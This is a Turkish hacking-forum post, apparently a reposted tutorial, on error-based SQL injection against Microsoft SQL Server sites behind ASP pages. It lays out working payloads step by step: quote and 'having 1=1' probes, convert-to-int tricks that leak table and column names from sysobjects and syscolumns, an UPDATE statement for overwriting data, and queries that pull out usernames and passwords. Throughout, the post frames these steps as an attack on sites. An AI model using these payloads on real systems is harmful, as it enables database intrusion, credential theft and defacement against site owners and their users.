MSSQL Injection

T

TRNooNTR

Kıdemli Üye
10 Kas 2008
2,519
0
drwxr-xr-x
[FONT=Verdana, Arial, Helvetica, sans-serif]MsSQL SQL Injection İçin En Uygun Sistemdir.Çünkü MsSQL Injectionda İş Access Gibi

Deneme/Yanılma Değildir.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Bir Sonuç Varsa %100 dür ( Her türlü olumlu ya da olumsuz)[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Accessde iş tahmindir,fakat mssql böyle değildir.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
MsSQL Injection İle çok şey yapabilirsiniz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Mesela ?[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
MsSQL Root ( Root Olma ) [/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
MssQL Update (Update yapma )[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
MsSQL **** ( **** atma index yedirme )[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
vs. vs. bir çok şey yapabilirsiniz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Fakat ben işin attack kısmına bakacağım.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Sitemize girdik,[/FONT]

lor=#0000cc www.x.com/a.asp?id=1
[FONT=Verdana, Arial, Helvetica, sans-serif]
Sonuna ’a yazdık ve enterladık >> [/FONT] color=#0000cc www.x.com/a.asp?id=1’a
[FONT=Verdana, Arial, Helvetica, sans-serif]
Bize şöyle bir hata vermesi lazım,[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]---------------------------------------------------[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Microsoft OLE DB Provider for ODBC Drivers error ’80040e14’[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif][Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ’a’.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]------------------------------------------------[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Bu hatayı aldık mı ? İşte bu siteye her bir şeyi yapabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Mesela?[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Update yapabiliriz [/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Update yapılması için tablo ve kolon adlarını bilmemiz gerekir.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Sitemizin linkinin yanına having 1=1 yazalım vede tablo ve kolon adını öğrenelim.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Yani [/FONT] color=#0000cc www.x.com/a.asp?id=1[FONT=Verdana, Arial, Helvetica, sans-serif] having 1=1[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Column ’Admin.ID’ is invalid in the select list because it is not contained in an aggregate

function and there is no GROUP BY clause.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Şöyle bir hata aldık.Bu şu demektir.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Admin tablosunda ID adlı bir kolon var.Diğer kolon adlarını bulmak için;[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Linkimizin yanına group by title having 1=1 ekleyelim.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Yani >> [/FONT] color=#0000cc www.x.com/a.asp?id=1[FONT=Verdana, Arial, Helvetica, sans-serif] group by title having 1=1[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Böylece diğer kolonları da bulabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Ardından aşağıdaki gibi de update yapabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
update TabloAdı set KolonAdı=’Buraya yazmak istediğiniz bir yazıyı yazın’;--[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
şekilde update yapabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Tablo adlarına tek tek bakarak sitenin gizli bilgilerini(Şifre vs.) alabiliriz[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Sitemizin linkinin yanına and 1=convert(int,(select top 1 name from sysobjects)) yazalım ve de

karşımıza çıkan ilk tablo adını bulalım.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Yani;[/FONT]
color=#0000cc www.x.com/a.asp?id=1[FONT=Verdana, Arial, Helvetica, sans-serif] and 1=convert(int,(select top 1 name from sysobjects))[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Şöyle bir hata vermesi lazım;[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]------------------------------------------------------------[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Microsoft OLE DB Provider for SQL Server error ’80040e07’[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Conversion failed when converting the nvarchar value ’AdminVerify’ to data type int.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]------------------------------------------------------[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Üstteki AdminVerify karşımıza çıkan ilk tablodur.Büyük ihtimal bütün şifreler vs. orda[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Diyelim AdminVerify çıkmadı.Poll Diye bi tablo çıktı.Bu tabloda şifreler vs. yok.Ben nası
ulaşabilirim?[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Linkimizin yanına and 1=convert(int,(select top 1 name from sysobjects where name>’tablo adı’)) ekleyelim.Tablo adı bölümüne Üstteki İlk çıkan tablo adını yazalım ve de diğer tabloyu çıkartalım.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
İşte böyle gide gide bulabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]ya da tablo adı bölümüne a yazalım.Böylece "a" karakterinden büyük olan ilk tablonun adını öğrenebiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Mesela ben bi ara u yazdım ve de users adlı bi tablo olduğunu fark ettim.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Ama yinede en garantili yok üstteki gibidir.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Şimdi kolon adı bulma,[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Örnek tablomuz AdminVerify olsun.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]and 1=convert(int, (select top 1 name from syscolumns where colid=1 and id=(select top 1 id from sysobjects where xtype=’u’ and name=’tablo adı’)))[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Linkimizin ucuna bunu ekleyelim.Sağ tarafta bulunan tablo adı yerine AdminVerify yazalım.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Böylece AdminVerify adlı tablomuzdan çıkan ilk kolon adını bulabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]üstteki colid=1 yerini colid=2 yapalım.Böylece 2. kolon adını bulabiliriz.3 yapalım , 3. kolon adını bulabiliriz.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]
Her şeyi bulduk diyelim.Nasıl username ve pass çıkarıcaz?[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]and 1=convert(int,(select top 1 KolonADı from Tablo Adı))[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Linkimizin yanına bunu ekleyelim.[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]Kolon adı yerine kolon adımızı (Örnek : ID )[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]tablo adımızın yerine de tablo adını ( Örnek : AdminVerify)[/FONT]
[FONT=Verdana, Arial, Helvetica, sans-serif]İşte böylece username ve pass çıkarabiliriz.[/FONT]


Saygılarımla,


Alıntıdır.
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.